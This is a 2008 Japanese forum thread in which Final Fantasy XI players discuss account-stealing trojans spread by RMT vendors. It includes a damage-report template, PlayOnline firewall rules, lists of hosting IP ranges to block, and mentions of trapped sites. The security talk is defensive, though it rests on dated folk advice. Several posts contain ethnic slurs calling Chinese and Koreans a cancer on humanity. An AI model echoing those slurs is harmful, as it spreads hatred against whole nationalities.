●● RMT業者の垢ハックが多発している件39 ●●
1 :
テンプレ :
2008/09/07(日) 05:04:36 ID:P9apNmu6
2 :
テンプレ :2008/09/07(日) 05:06:06 ID:P9apNmu6
----------アカハック被害報告用テンプレ(書ききれない場合は複数レスに分けて下さい)---------- ●気付いた日時(アカハック被害に気付いた日時) ●不審なアドレスのクリックの有無(blog/bbs/Wiki等で踏んだ記憶の有無とそのアドレス、ドメインのドット(.)を○等で置き換える事。h抜き等は駄目) ●他人が貴方のIDを使用したことが一度でもあるか(Yes/No) ●ID・Passの認証方法(POLに保存/自動ログイン/手打ち、途中で変更した場合はその履歴、例:自動ログイン→○月○日から手打ち、等) ●Pass変更の履歴(した/していない・していたならパスの最終更新日、等) ●他人が貴方のPCを使う可能性の有無(Yes/No) ●ツールの使用の有無:Yes/No・Yesの場合はそのToolの説明 ●ネットカフェの利用の有無:Yes/No ●使っているOS(SP等まで書く) ●使用ブラウザ(バージョン等まで分かれば書く) ●WindowsUpdateの有無(最終更新日、等) ●FlashPlayerとRealPlayerのバージョン(更新日時をわかる範囲で・未導入であれば無し) ●アンチウイルスソフト(たとえば NortonInternetSecurity2008 等の名称、及びパターン更新日) ●その他のSecurty対策(Spybot S&D、ルータ、等) ●ウイルススキャン結果(たとえば カスペルスキーオンラインスキャンでC:\WINDOWS\System32\○○.DLLをTrojan.W32○○として発見 等) ●スレログやテンプレを読んだか(Yes/No/今から読みます) ●hosts変更(有/無・有りの場合は最終更新は何時ごろか) ●PeerGuardian2の導入(有/無・有りの場合は参照元サイトはどこか) ●その他情報・症状など(書ききれない場合は次レスで書いてください)
3 :
テンプレ :2008/09/07(日) 05:06:52 ID:P9apNmu6
■各種ソフトのアップデート報告(情報提供等)について
スレ内を検索しやすいように各種ソフトのupdate情報には符丁をつけておくことを推奨します。
★FlashPlayerなどAdobe系ソフト、Firefoxなどブラウザ、NoScriptなどアドオンなどの更新があったときには
※※各種ソフトウェアアップデート情報※※
★セキュリティホールに関するニュースが出たときには
※※セキュリティホール情報※※
を付けてみてください。
以上、ここまでテンプレ
■そのほかの一般テンプレに関しては「
>>1 」にあるテンプレサイトの「具体的な自衛策」をご覧ください
4 :
テンプレ番外 :2008/09/07(日) 05:09:36 ID:P9apNmu6
前スレで要望がありましたので出しておきます ■POL用ファイアーウォールの設定(アプリケーションルールでpol.exeの設定) ※これはpol.exeのプロセスの一部に同化してアカウント情報を送信するマルウェアにしか効果がありません。 現在、上記に該当する既知のものはwzcsvbxm.dll系・Kernaeghdrv.dll系です。 ※下記設定(記述の仕方)はお使いのソフトによって異なりますので、それぞれのソフトのFQAをご自身でご確認ください。 許可しているリモートIPの範囲 61.195.48.0-61.195.55.255 (61.195.48.0/21) 61.195.56.0-61.195.59.255 (61.195.56.0/22) 61.195.60.0-61.195.63.255 (61.195.60.0/22) 202.67.48.0-202.67.63.255 (202.67.48.0/20) 219.117.144.0-219.117.159.255 (219.117.144.0/20) ※「61」で始まるIPは「61.195.48.0-61.195.63.255(61.195.48.0/20)」でくくってしまっても○ ※FWによっては()内のIPアドレス範囲の設定の仕方を指定できるようなので、その場合()内の数値を使用すると 設定が簡単になります。 空けているローカルポート TCP1024-65535 UDP50000-65535 空けているリモートポート TCP25,80,110,443 ,50000-65535 UDP50000-65535 ※契約プロバイダによってはローカルポート UDP53番が必要になるようです(プロバイダに確認してください)
5 :
既にその名前は使われています :2008/09/07(日) 05:35:46 ID:P9apNmu6
前スレの
>>964 に出ていた件
必要性はあまり感じませんが、必要だと思われる方は反応してくださいm(_ _)m
964 :既にその名前は使われています:2008/09/07(日) 00:44:58 ID:2eVn6Peg
【トロイ広告】xrea.com part135【放置プレイ】
http://pc11.2ch.net/test/read.cgi/hosting/1219797151/301 > 301 名前:名無しさん@お腹いっぱい。:2008/09/06(土) 23:44:25 0
>
>>299 > それさ、flashなどの惰弱製を狙ったウィルスはFF11のクライアントソフトの内容を書き換えるものだった
> だけどFF Warningとかいうサイトでは大元のウィルスに対する対策しか報じていない
> ウィルスによって書き換えられたクラインアントソフトに対して何の対策も講じていないんだよ
> それなのにこの話題を扱ったスレでは「カスペルスキーでオンラインスキャンしろ」
> とかいう対策がまかり通っている。それで安全だと思っている
> その程度の危機意識の管理人がサイト運営をしている
>
> カスペルスキーが対策したのは大元のウィルスで、そのウィルスによって仕込まれた可能性のあるスパイウェアじゃない
pol.exeが書き換えられるのか?詳しい人解説を頼む。
6 :
5 :2008/09/07(日) 05:49:43 ID:P9apNmu6
とりあえずPOL.exe改竄については、かなり前のスレで話題になっていましたので そのときのログ↓ >353 :既にその名前は使われています:2008/07/11(金) 17:41:16 ID:ZiN5jL/U >MD5 (pol.exe) = dc11348f317f613aa55c3e8b4b749c09 >恐らく感染していないだろうpolのMD5値です。ファイルサイズは>347と一緒 ↓ >398 :既にその名前は使われています:2008/07/11(金) 18:48:52 ID:4z35c7ut >多分感染してるPCのpolです(シャットダウンと終了オプション アプリケーションの追加と削除が異様に遅い) >MD5 (pol.exe) = dc11348f317f613aa55c3e8b4b749c09 >1,691,648 バイト >pol改ざんじゃないのかな
続きくらいかけと・・・>>ID:P9apNmu6 POL.exeが改竄される件についてはこのスレで結論出てますね 398の「多分」の部分を完全に打ち消したいので、できれば感染経験者さんに もう一度POL.exeをVirus Totalにでも投げてもらって、そのMD5値を確認したい ところです
特定のソフトを貶めたいわけじゃないんですが、嘘情報が広まるのもよくないので
前スレのノートンファイアウォールについての続き
>>953 > ノートン360はウンコという評価が定番
>>954 >急にノートン叩き湧き出して笑った。
>NIS入ってると1039045744:88みたいな普通使わないポート88使うようなのは警告出てバレるのに気がついたのかね。
>>956 >本当に警告でる?
>>958 >「全てを許可」なんてアホな設定にしてなければ出ます。
>>959 >360で検証
>デフォルト設定 → 普通に接続できます。
>99をブロックするように設定 → 当然ブロック。ただしログはでない。
前スレは360の検証だったのでNIS2008でも確認 ・デフォルト設定 → 普通に接続できます ・99をブロックするように設定 → 当然ブロック。 これはいいとして、NISは360と違い、「ログを出す」オプションがあるんですが、 ★ログは実際には出ません★ 以下のログのいずれにも記録されません。 「ネットワーク接続」「ファイアウォールの活動」「侵入防止」「サービスの活動」 「ファイアウォールの警告」「セキュリティリスク」「保護活動」「エラーメッセージ」 ファイアウォールの「プログラム制御」による設定でも「信頼制御>一般ルール」の いずれでもブロックはするもののログは出力されません。 こんな超弩級の基本的なバグが放置されてるって一体・・・・ また、ログではなく「警告を画面に出す」機能は最初からありません。 うーむ・・・。初心者に警告出しても「これなに?」ってサポートに問い合わせがくるからやめておこうってことなのか・・・? それともなんか俺勘違いしてる? 「こうやれば出るよ!」とか「俺の環境だと警告出る」とかあれば言ってください。
10 :
既にその名前は使われています :2008/09/07(日) 08:06:30 ID:i9/Ql2Jh
11 :
既にその名前は使われています :2008/09/07(日) 09:45:49 ID:j9D/cbNj
新スレ乙です
マジで特亜人って人類の癌細胞だわw
13 :
既にその名前は使われています :2008/09/07(日) 10:52:06 ID:u0P65rU4
14 :
既にその名前は使われています :2008/09/07(日) 12:45:38 ID:/U63M+mv
age
15 :
既にその名前は使われています :2008/09/07(日) 12:57:13 ID:XgMe+0pj
>>5 なんかこのレスの人微妙にズレてるっつーか、スレで話してる内容ちゃんと理解してないっぽいんだよね
>それなのにこの話題を扱ったスレでは「カスペルスキーでオンラインスキャンしろ」 とかいう対策がまかり通っている。それで安全だと思っている
カスペオンラインが薦められるのはその手のトロイに対する定義ファイルの対応が「比較的」早いので
検出の可能性が「若干」高いから。怪しいと思ったらまず原因を見つけとけって話でしょ。
見つけた後の事後「対策」はまた別の話だと思う。
>カスペルスキーが対策したのは大元のウィルスで、そのウィルスによって仕込まれた可能性のあるスパイウェアじゃない
っていう認識は現状と真逆でしょ。悪さをするトロイ自体は特定できたけど、
そいつを生成する(仕込む)大元のドロッパなんかを見つけられてないからクリンインスコでまっさらにしろって薦められてるんだし。
一昔前のwzcsvbxm.dllの挙動「pol.exeの起動と同時に干渉し送信データを盗む」「潜伏するためにWindowsupdateに係るレジストリを書き換える」
そのへんをごっちゃにして「クライアントソフト自身が書き換えられる」とか言ってんじゃないの
つーか「惰弱性」とか言ってる時点でよくわかってない子の気がするよ
バスター未検知でカスペでTrojan-Downloader.JS.Agent.clnが出た。 これ垢ハックと関係あるよな・・・ めんどくせー
面倒なら是非そのままで
18 :
既にその名前は使われています :2008/09/07(日) 14:43:30 ID:zDuml//+
age
前スレ
>>986 >>990 サービス終了にしたいんじゃなくてw
最大の対策はサービス終了くらいしかないって意味で
20 :
既にその名前は使われています :2008/09/07(日) 14:54:09 ID:kAqzFDMF
wikipediaまた韓国に戻ったみたいだね
21 :
既にその名前は使われています :2008/09/07(日) 16:46:59 ID:zcjAbgev
249からあげあげ
22 :
既にその名前は使われています :2008/09/07(日) 17:12:33 ID:GZkd69Gd
ほしゅ
23 :
既にその名前は使われています :2008/09/07(日) 17:42:51 ID:et3/39ah
とうとうニコニコもやられたのか。シナチク糞だな…。
24 :
既にその名前は使われています :2008/09/07(日) 17:50:47 ID:3si1g2uS
>>13 それってBlogとかにあるニコ動リンク?
それともニコ動内を見てるだけでアウトなの?
25 :
既にその名前は使われています :2008/09/07(日) 18:00:38 ID:fK3v7qah
>>19 中華の中継プロキシつぶせばいいじゃん
どんどん
26 :
既にその名前は使われています :2008/09/07(日) 18:11:55 ID:u0P65rU4
>>24 www.nicovideo.jp/watch/sm4271888
13はこれのキャッシュだよ(今は害がある文面ではない)。
当時でも直接リンクになっていないからコピペしてアクセスを試みなければよいのだけど、
うっかり引っかかったやつがいたんだろうね。
投稿した動画などから狙いはコピペしてアクセスしてくれることを期待しつつ、
虱潰し的に感染させて根こそぎふんだくろうという作戦だろう。
しかし程なくしてゴルァが入って罠リンク部分が運営によって”test”になったんじゃね?
ニコにはもう中華が入り込んだと見ていい、アカウントも残ったままだ、
ライブドアの対応並に厄介かもしれない。
動画の説明にリンクが書かれていたらコピペアクセス前に検索をかける癖をつけないと
引っかかるやつ多発しそう。
気をつけてくれよな!
ニコで色んなMMOの広告がある→中華介入→中華^q^ドワンゴ^q^
28 :
既にその名前は使われています :2008/09/07(日) 18:19:17 ID:fzWKA96R
こんな所で悩んでないでPS2買ったら? 出来ればPS-Xがいいと思います!
29 :
既にその名前は使われています :2008/09/07(日) 18:28:16 ID:4uLGfdbL
www.nicovideo.jp/watch/sm4271888のうぷ主は業者ではないね。 マイリス公開してるし 同じハンドルでサイトもやってて結構いろんなとこで着メロの配信もしてる。 ニコニコのパス抜きに引っかかったと見るべきかと思います。 参考までにsm4271888は現時点で 再生数11
30 :
既にその名前は使われています :2008/09/07(日) 19:16:12 ID:+Uu8iire
>>16 俺もバスターwさん使い
カスペで月1の割合でオンラインスキャンしてるんだが、一度もウィルスかからず。
こういうのは「重要な領域」以外から見つかるものなのか?
ageage
31 :
既にその名前は使われています :2008/09/07(日) 19:22:23 ID:/OVVhCGv
32 :
貼り直し :2008/09/07(日) 19:24:28 ID:/OVVhCGv
うちのサイトcoreserver.jp使ってるんだけど 中国圏から大量の検索ログ残ってた coreserver.jp ff11
34 :
既にその名前は使われています :2008/09/07(日) 19:41:16 ID:/OVVhCGv
35 :
既にその名前は使われています :2008/09/07(日) 20:16:51 ID:HnX6qcM9
xreaサイトIP 50.139.29.96 - 59.139.29.127 59.139.29.224 - 59.139.29.255 60.32.200.64 - 60.32.200.95 60.32.201.90 - 60.32.201.127 125.53.24.64 - 125.53.24.95 125.53.24.128 - 125.53.24.159 125.53.25.0 - 125.53.25.63 125.53.25.224 - 125.53.26.31 202.229.187.24 - 202.229.187.27 210.153.88.112 - 210.153.88.115 210.172.108.224 - 210.172.108.255 210.196.169.192 - 210.196.169.223 210.196.173.48 - 210.196.173.63 210.196.176.176 - 210.196.176.191 210.251.253.224 - 210.251.253.255 218.216.67.32 - 218.216.67.63 219.101.229.128 - 219.101.229.191 219.163.5.176 - 219.163.5.191 219.163.200.64 - 219.163.200.127 221.186.251.64 - 221.186.251.127 222.227.75.0 - 222.227.75.63 222.227.75.96 - 222.227.75.159 補完あればよろしく
36 :
既にその名前は使われています :2008/09/07(日) 20:35:04 ID:3YI6N1+P
なぜXreaの運営は対策をしないのか なぜなんだい
周りが騒いでるのニヤニヤして楽しんでる
38 :
既にその名前は使われています :2008/09/07(日) 20:42:11 ID:HnX6qcM9
>>36 重要度の問題かもしれませんね
たかがゲームになんの対策だと思ってる運営かもしれません
39 :
既にその名前は使われています :2008/09/07(日) 21:35:45 ID:Q4cxzYaa
逆に考えるんだ、対策をしないのではなくハニーポットなのだと
40 :
既にその名前は使われています :2008/09/07(日) 21:38:43 ID:4uLGfdbL
サポートみてても 最近のXREAはVALUE DOMAINのオマケで やりたくないのにやってるって感じ。 XREAは広告ついてる無料のユーザーでも シェルもcronもDBもcgi使える。 coreで年額5000円 xreaで2400円 比較できる料金帯だとさくらのスタンダード一択だけど DBが弱いから MTやWPやってる人には厳しい。 よそで同じ機能のレン鯖借りようと思ったら1年最低5万かかると思ってくれ。 つまりXREAはノンサポート前提で 他のレン鯖に比べたら超やっすい。 その代わり基本的なトラブルはユーザで解決してくれってスタンス。 だから イヤナラヤメテモイインジャヨ なんだと思うよ。 それはかまわないんだが 前回の広告のときの対応の遅さにあきれて見切りつけたくても 機能と費用考えたら手ごろな移転先がない=競合がない状態だから それで 放置してるかもしれないね。
41 :
既にその名前は使われています :2008/09/07(日) 21:41:06 ID:3YI6N1+P
まともに鯖管理する気ねぇなら業務たたんじまえカスが!!! と電話凸していいですか><
42 :
既にその名前は使われています :2008/09/07(日) 21:41:28 ID:4uLGfdbL
ゲームだから放置ってんじゃなくて もー全体的に放置 負荷の高いサーバがあってもシステム障害が出ても放置 負荷かけてるユーザも放置 放置プレイ
43 :
既にその名前は使われています :2008/09/07(日) 21:51:16 ID:fzWKA96R
このスレもういらなくね?今俺がageなかったら@10年くらいで落ちてたぞ?
44 :
既にその名前は使われています :2008/09/07(日) 21:55:07 ID:HnX6qcM9
45 :
既にその名前は使われています :2008/09/07(日) 22:30:42 ID:a1yOjulH
前スレでもxreaの話はあったが、xrea,fc2の話は基本レンタル鯖板でやった方がいいと思う。 エンドユーザー側がどういう対策がありうるかはこっちでいいけど。
46 :
既にその名前は使われています :2008/09/07(日) 22:49:14 ID:HnX6qcM9
>>45 スレ維持のためには、いまは話題を選ばないほうがいいと思います
まぁ無料だでぐだぐだ言うなw xrea,fc2は飽きた
48 :
既にその名前は使われています :2008/09/07(日) 23:06:58 ID:t1RrHRi1
49 :
既にその名前は使われています :2008/09/07(日) 23:17:03 ID:RVLrptBS
韓国中国はほんとに腐ってるなw こんな国と一緒にアジアでくくられるとかありえない
50 :
既にその名前は使われています :2008/09/07(日) 23:47:54 ID:EpFXlXM2
age
51 :
既にその名前は使われています :2008/09/08(月) 00:08:29 ID:y5dO6Fj0
ho
52 :
既にその名前は使われています :2008/09/08(月) 00:28:41 ID:3R2Iap7Y
おやすみ前のあげ。
53 :
既にその名前は使われています :2008/09/08(月) 01:20:10 ID:ojEUk+eX
よいしょー
ニコニコ見てたらPG2が反応したわ なんかキモイ動画だったし納得
55 :
既にその名前は使われています :2008/09/08(月) 01:32:23 ID:+j7s2vwq
それニコニコ市場の商品画像とかの鯖がたまに大陸にあるからだな
56 :
既にその名前は使われています :2008/09/08(月) 01:35:51 ID:KHZNPbGR
徐々にネットに安全な場所がなくなっていくのがなんか嫌だなぁ
57 :
既にその名前は使われています :2008/09/08(月) 01:45:43 ID:52OE/rH3
あげー
58 :
既にその名前は使われています :2008/09/08(月) 02:46:29 ID:q935o361
204唐揚げ
59 :
既にその名前は使われています :2008/09/08(月) 02:55:01 ID:af9EwmMY
おやすみage。
おでん規制かorz どれもこれも垢ハックに起因してるな...
>>13 >>24 >>26 を100回読んだけどいまいち理解できなかったorzモウトシカ...
1)ニコに罠が仕込まれた
2)ニコの動画はブラフでブログでのリンク先が罠になってる(コピペでボーン)
どっちなんだろう。
60 :
既にその名前は使われています :2008/09/08(月) 04:06:33 ID:q935o361
>>59 ニコ動に中華が入り込んでる認識でいいと思いますよ
ニコ動にも罠が仕掛けられてるようです
61 :
既にその名前は使われています :2008/09/08(月) 04:18:51 ID:0fCz8wRX
これyoutubeとかにやられたら世界的に被害広がるんだろか てか、外国でも中華の垢ハック問題になってんのかな
62 :
既にその名前は使われています :2008/09/08(月) 04:22:33 ID:jr8wE7vW
色々調べてFFやりたいのに出来ないし ネット巡回も危うくなってきたし いくら対策しても安心は出来ないし なんと言ってもFF系を調べる事に恐怖を感じるようになった。 情報ないとやりたい事もできやしない
63 :
既にその名前は使われています :2008/09/08(月) 04:26:20 ID:r8X2arpN
FFはとっくに引退したから関係ないけど これってブラウザ関係なく抜かれるの?
64 :
既にその名前は使われています :2008/09/08(月) 04:28:36 ID:q935o361
>>63 スクリプトを確実に不許可にできる環境なら「いまのとろは」大丈夫です
スクリプトが許可になってればウィルスは落ちてくる可能性が高いですね
ここで危険だと言われているサイトはとくに
65 :
既にその名前は使われています :2008/09/08(月) 06:41:47 ID:D89/wyuv
NHKでヤフーIDハックのニュース流れてる
66 :
既にその名前は使われています :2008/09/08(月) 06:46:08 ID:D89/wyuv
>>62 すっげーわかるわ
ネットで調べないと何も出来ない何も準備できないのに
危険だからネット巡回できない
安全にスクリプト全部切ってネット巡回すると、サイトの内容が表示されないからやっぱりFFできないw
公式攻略サイトでもつくってくれ■e
67 :
既にその名前は使われています :2008/09/08(月) 06:59:31 ID:HR7/KtOk
PS2買えば全て解決では?
69 :
既にその名前は使われています :2008/09/08(月) 09:58:24 ID:kDOIvn+p
ところで、アメリカとかで垢ハックはやってるの? スクエニがハックについてpolシステムの変更を検討中をか話は聞かないけど。 米にハックがはやってたらもっと具体的な対策とらないか?
70 :
既にその名前は使われています :2008/09/08(月) 10:04:29 ID:ojEUk+eX
保守のついでに俺対策。 FF専用機を購入してセキュリティ一通り設定して、1ログインログアウト毎にPS2で入りなおしてパス変えて PCでFF中も、万が一業者とログイン合戦になった時の為にPS2をログイン画面で待機させている。 それでも不安でーす○| ̄|_
71 :
既にその名前は使われています :2008/09/08(月) 10:10:16 ID:3gUpYF64
>>69 NAの友人に垢ハックについて聞いてみたところ、「知っている」とは言ってたけど
日本ほどやられてるってわけじゃないみたいだ。
なんでだろなあ?
あっちの人は皆セキュリティ意識が高いとか?
俺の英語能力では聞き出すことができんかったw
>>71 業者の2/3近くが中国、残りの1/3近くが日本在住の業者だからじゃねーの?
73 :
既にその名前は使われています :2008/09/08(月) 10:36:45 ID:6ad+/hAj
74 :
既にその名前は使われています :2008/09/08(月) 10:54:14 ID:3gUpYF64
>>73 _| ̄|○
どこで話題になってるかすらわからねぇ・・・俺の英語能力底辺すぎる
75 :
既にその名前は使われています :2008/09/08(月) 11:03:09 ID:fAEWBEVY
お前が勝手に安全と思ってるだけで昔っからネットは危険なところでしたよっと
76 :
既にその名前は使われています :2008/09/08(月) 11:08:41 ID:cgSDN3ix
>>75 危険/安全どっち? といえば昔から危険だったんだろうが、ここ1〜2年で桁違い。
例えるなら、
昔のハッカ(いたずらっ子)ー=西サルタのヤグ → 今のハッカー(犯罪者)=AbsoluteVirtue
昔:近づかなければ大丈夫、今:タゲられたら死ぬしかないレベル。
78 :
既にその名前は使われています :2008/09/08(月) 12:18:06 ID:PFSf1pTI
>>77 昔のハッカーは20世紀の話で「ここ1〜2年」じゃないだろ
自己顕示欲から金銭目当てに動機がシフトしたからだろ
80 :
既にその名前は使われています :2008/09/08(月) 14:33:57 ID:eRiSmt7L
270からあげ
81 :
既にその名前は使われています :2008/09/08(月) 14:43:52 ID:g2FLUzow
>>79 それは
>>77 と同じで認識が古い
金儲けの手法自体がどんどん進化してることが問題
82 :
既にその名前は使われています :2008/09/08(月) 14:57:48 ID:gOf3EkFq
MMOのゲームデータがいい金になる、なんて数年前には予想もつかなかった。 たかがゲームとヌルい事言われているうちに全力でハクる。
83 :
既にその名前は使われています :2008/09/08(月) 15:23:28 ID:eRiSmt7L
まぁでも、書き込みもかなり減ったから落ち着いてきている 状況ではあるのでしょうね 一回やられて注意する人が増えたのか、二回目もやられて 泣く泣く引退した人が増えたのか、どっちだかわからないけど
ハックされて一回目で引退したよ。 悔いはLSの人、フレにちゃんとあいさつ出来なかった事。 マジで特亜は地球の癌。 (´∀`∩)↑age↑
85 :
既にその名前は使われています :2008/09/08(月) 16:34:59 ID:gOf3EkFq
面倒な警察届け出とかまでの段階にいく人は多くないのかもしれないね。 ちょっと飽きて来たしこのままでいいかってな泣き寝入り含むと 相当数、今も静かに被害で続けているのかも。
86 :
既にその名前は使われています :2008/09/08(月) 16:37:46 ID:6ad+/hAj
>>85 あの電話のつながらなさを体験すると
もうどうでもいやってなる人がでるのは当然だろw
87 :
既にその名前は使われています :2008/09/08(月) 16:39:47 ID:zePAMs9G
FFはPS2でやってるから問題ないが、メールの広告クリックしてポイント貯めるサイトでやられた。 全部パス一緒だったし、まあ自分が甘かったわけだが約3万の損失。
↑↑↑↑↑ ↑PON!↑ ↑↑↑↑↑
89 :
既にその名前は使われています :2008/09/08(月) 16:56:16 ID:MDUcReok
90 :
既にその名前は使われています :2008/09/08(月) 16:57:21 ID:waOb9nxe
91 :
既にその名前は使われています :2008/09/08(月) 17:15:40 ID:1ux/xFhq
>>90 少なくともID=パスの馬鹿には返金どころかヤフー側が損害賠償請求していいだろ
92 :
既にその名前は使われています :2008/09/08(月) 17:19:28 ID:N6rm9Ltp
ヤフオクやってる奴は気の毒だが、 これで中華=垢ハックが少しでも多くの人に知られるようになるのはありがたい
93 :
既にその名前は使われています :2008/09/08(月) 17:19:44 ID:hGu5pLWB
ID=パスを通すYahooのシステムが・・・
94 :
既にその名前は使われています :2008/09/08(月) 17:43:45 ID:eRiSmt7L
>ログイン後は、ゲームデータに被害を受けていないかどうか、ご確認ください。 >また、不正アクセスに遭われた旨を、最寄りの警察署へ通報してください。 いちおうスクエニも警察に通報しろって言ってるのね 不正アクセス対策をしっかり読んでて初めて知った
95 :
既にその名前は使われています :2008/09/08(月) 18:32:23 ID:9pGukVIS
最近PG2のブロック履歴で666■lazh■comが頻繁にあったんで
見に行ったサイトまわってみたら「R.ブレス ソロ ラーニング」でぐぐって
一番目のとこだった。
http://d ■hatena■ne■jp/mako0079/
調べ物とかほんと気軽にできなくなったなぁ。
96 :
既にその名前は使われています :2008/09/08(月) 18:37:19 ID:XkPRbnpR
xreaってeLeMeNも使ってるみたいだけど見ただけでヤバいの?
97 :
既にその名前は使われています :2008/09/08(月) 18:40:25 ID:7MJP/2Sm
>>96 サイトはplala
解析だけAccessAnalyzer
98 :
既にその名前は使われています :2008/09/08(月) 19:06:59 ID:XkPRbnpR
サイト自体にxrea使ってなければ大丈夫って事なのか。
99 :
既にその名前は使われています :2008/09/08(月) 19:15:39 ID:iF0HAmRi
その考え方は危険だよ。 xreaだけが危険って訳じゃないしさ。
100 :
既にその名前は使われています :2008/09/08(月) 19:38:36 ID:HbdQ5VOP
>95 そこは昔からあるFFブログのアンテナだな。 おそらく引っかかってるのはその先のはず。 今手元に調査する環境が無いから誰か頼む。
101 :
100 :2008/09/08(月) 19:40:12 ID:HbdQ5VOP
>95 すまん、URL勘違いした。 FFアンテナは似てるけど違うところだった。
eLeMeNに解析違うのにしたら?って言ったら うざって返ってきた
アンチ乙
104 :
既にその名前は使われています :2008/09/08(月) 20:57:04 ID:y5dO6Fj0
浮上
105 :
既にその名前は使われています :2008/09/08(月) 21:24:31 ID:NIMda1OG
IDがニムダ10ギル・・・ 記念に上げさせてください><
106 :
既にその名前は使われています :2008/09/08(月) 21:56:25 ID:wq6g7muI
age
107 :
既にその名前は使われています :2008/09/08(月) 22:14:46 ID:0rBZ2CDi
ん? plalaも危険なの? 何かポップアップブロックの設定の許可されたサイトの欄に 勝手に*.plala.jpが入ってた。
109 :
既にその名前は使われています :2008/09/08(月) 22:31:49 ID:iV04zgsQ
>>102 ウザッてこともなかったが
部外者がくちdって帰ってきたことがあったな
110 :
既にその名前は使われています :2008/09/08(月) 22:42:00 ID:+BRKslep
>>59 >>60 おれもいまいち理解出来なかったorzスマン
今の所の情報では、動画(ニコ動)をクリックで直に罠サイトへ飛ぶ訳では無いって事で
いいのかな?
>>13 >>24 >>26 の文面だとコメント(投稿者として?)にアドレスがあったように読めるけど、
動画自体が罠サイト付きにも読めるので(^^;
とりあえずの対策は、クリック前にマウスあててアドレス見たり
>>26 で書いてあるように
コメントは読む程度で、アドレスあっても全部無視する位がいいかな。
動画自体にはジャンプ機能なんてのが少し前に実装されたけど、これって外部に飛ばしたりは
出来るのだろうか?
111 :
既にその名前は使われています :2008/09/08(月) 22:47:10 ID:/FLNi09F
>>107 何度も繰り返されてるようにXREAさえ弾いてりゃ安心って誤解が一番怖いんだけどねぇ。
そのブログ読むと OPENDNS設定すりゃ垢ハクにあわなくて ff11プレイヤーだけの問題みたいに読めて
あんまりいい印象はもてないなぁw
112 :
既にその名前は使われています :2008/09/08(月) 22:52:20 ID:FnqYsYhv
verup前後は、FF系のいろんなサイトが改ざんされそだな。
113 :
既にその名前は使われています :2008/09/08(月) 23:00:24 ID:/FLNi09F
114 :
既にその名前は使われています :2008/09/08(月) 23:08:50 ID:0rBZ2CDi
>>113 OpenDnsマンセーなのは、情報交換が活発で
ほぼ即座に反映されるからだよ
お前らみたいに、「感染したどーしよ、感染してみるかw」
じゃないって事だ。
ちなみに、googleの関係でアンチOpenDnsがいるのは
知ってる。
まー、ここのスレ住人だったらほとんど仮想PC何台も持ってるだろうし
オンラインゲーマーなら仮想PC常識だから
OpenDnsの存在いらないんだろうけど
初心者系としては踏む前に回避できるという点は
非常にありがたい
>>111 多分、例えば楽天が同じミス起こせばおんなじ感じに
なると思うよ
>>111 尼とかのメジャー通販サイトのキーロガーとかになれば話は違うはず
どこを見ても「たかがゲームじゃねえの?」って反応だからなあ
セキュリティに穴があるのはFFに限ってやばいってわけじゃないのに
116 :
既にその名前は使われています :2008/09/08(月) 23:22:00 ID:dSq3Suf3
>>105 うはーNimda懐かしすぎるwww
次はクレズよろw
117 :
既にその名前は使われています :2008/09/08(月) 23:24:20 ID:J3J+5JJF
>>105 俺の変な顔文字に見えるIDと交換してくれよ
なんかヒキオタっぽくて嫌なんだが
118 :
既にその名前は使われています :2008/09/08(月) 23:38:58 ID:3R2Iap7Y
おやすみ前のあげ。
119 :
既にその名前は使われています :2008/09/09(火) 00:24:14 ID:knuGnjo1
さがりすぎだーー
120 :
既にその名前は使われています :2008/09/09(火) 00:29:54 ID:UTrgGkL7
馬鹿が軒並み感染し終えてFFXIの垢ハック効率は落ちてきただろうから そろそろ業者側もメインのターゲットを変えてくると思うけどね もっともそれでFFXIの垢が狙われなくなるわけじゃないけどな 別のターゲットを狙うついでにFFXIの垢も盗んでいくだけで
121 :
既にその名前は使われています :2008/09/09(火) 00:54:42 ID:KNKXt9t/
効率が悪くなっても少しでも金が入ってくるならやめない どうみても赤字なのに紙兵作り続けたり、 対価が悪いのにアメマン張ってたり、効率とかあまり関係ありません 全て食い尽くして、勝手に値下げして勝手に自滅してから ようやっと他のに移動する、そんなやつらですよ 「儲かるなら俺も俺も」で、どんどん業者が増えていく 自分らで食い尽くして自滅するまで メインのターゲットは移動せず、そのメインが2つ、3つ〜に増えていく感じ
122 :
既にその名前は使われています :2008/09/09(火) 01:15:23 ID:UTrgGkL7
>>121 それはメインターゲットがFFXIの現状でも同じ
FFXIのサイトを重点的に改竄するような状況が変わるんじゃないかってこと
FFXIユーザーにとって状況が好転する話ではない
123 :
既にその名前は使われています :2008/09/09(火) 01:26:30 ID:NHLtkFd4
あげ
124 :
既にその名前は使われています :2008/09/09(火) 01:49:38 ID:KNKXt9t/
やばい、VUで加速してる 20分で170とか あげ
125 :
既にその名前は使われています :2008/09/09(火) 02:20:26 ID:KNKXt9t/
180
126 :
既にその名前は使われています :2008/09/09(火) 02:23:35 ID:0tCB7TAk
ageage
127 :
既にその名前は使われています :2008/09/09(火) 02:25:40 ID:axmnEoH3
128 :
既にその名前は使われています :2008/09/09(火) 02:39:12 ID:MD1/gN05
メンテ明けまで時間があるので徹底的にカスペオンラインスキャン走らせてみるかage
129 :
既にその名前は使われています :2008/09/09(火) 02:39:31 ID:0bKpFSr2
>万が一、不正アクセスの被害に遭われた場合は、不正アクセス対策ページを >よくご確認の上「不正アクセス専用チャットサポート」までご連絡ください。 のあとに 「これ以上不正アクセスが増えるようであれば、当社では利益的に 対処しきれないのでWindows版を切り捨てます」 とか書いておけばいいのに
130 :
既にその名前は使われています :2008/09/09(火) 02:41:06 ID:0bKpFSr2
>>128 オンラインでは徹底的にできませんから、お試し版なり製品版を入れた
ほうがいいと思いますよ
131 :
既にその名前は使われています :2008/09/09(火) 03:09:49 ID:ymkbYNLJ
無料の Avira AntiVir Personal がいいですよ。 評判はとても良いです。 欠点は表示が英語というところでしょうか。
>>129 Windows版切り捨てたらユーザー5分の1程度になるぞ
でバージョンうpの頻度も落ちサービス終了
133 :
既にその名前は使われています :2008/09/09(火) 03:17:03 ID:c4zU3J+Q
>>132 半分以上はPS2ユーザじゃなかったか?
134 :
既にその名前は使われています :2008/09/09(火) 03:33:55 ID:EdB8bo21
そりゃねーだろ しかしながら半分も減ったらサービス終了は間違いないな
135 :
既にその名前は使われています :2008/09/09(火) 04:01:18 ID:0bKpFSr2
>>132 本気で思ってるわけではないですけどね<切り捨て
それくらい脅さないと、なかなかユーザーの自己防衛が徹底しないと思ったからです
ここ見ている人は大丈夫でしょうけど、見てない人のほうが多いし
136 :
既にその名前は使われています :2008/09/09(火) 04:02:13 ID:MD1/gN05
感染していませんでしたage
137 :
既にその名前は使われています :2008/09/09(火) 04:05:37 ID:0bKpFSr2
